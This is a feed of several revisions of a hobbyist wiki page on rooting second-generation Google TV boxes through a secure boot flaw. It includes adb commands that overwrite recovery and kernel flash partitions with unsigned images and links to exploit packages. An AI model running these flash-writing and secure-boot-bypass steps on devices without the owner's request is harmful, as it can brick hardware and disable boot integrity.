#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery b 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cd /data/local/tmp&lt;br /&gt;
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel b 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;cd /data/local/tmp&lt;br /&gt;
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1201</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1201"/>
		<updated>2013-08-07T23:57:41Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Custom Recovery Steps (Sony) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery b 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cd /data/local/tmp&lt;br /&gt;
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;cd /data/local/tmp&lt;br /&gt;
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1198</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1198"/>
		<updated>2013-08-07T01:01:39Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Custom Recovery Steps (Sony) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cd /data/local/tmp&lt;br /&gt;
#: dd if=/mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin of=/mnt/media/usb.LABEL/gtvhacker-recovery bs=2048&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;cd /data/local/tmp&lt;br /&gt;
#: dd if=/mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin of=/mnt/media/usb.LABEL/gtvhacker-mtd8 bs=2048&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1197</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1197"/>
		<updated>2013-08-07T01:01:11Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Developers Only (SONY) (UART console required) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
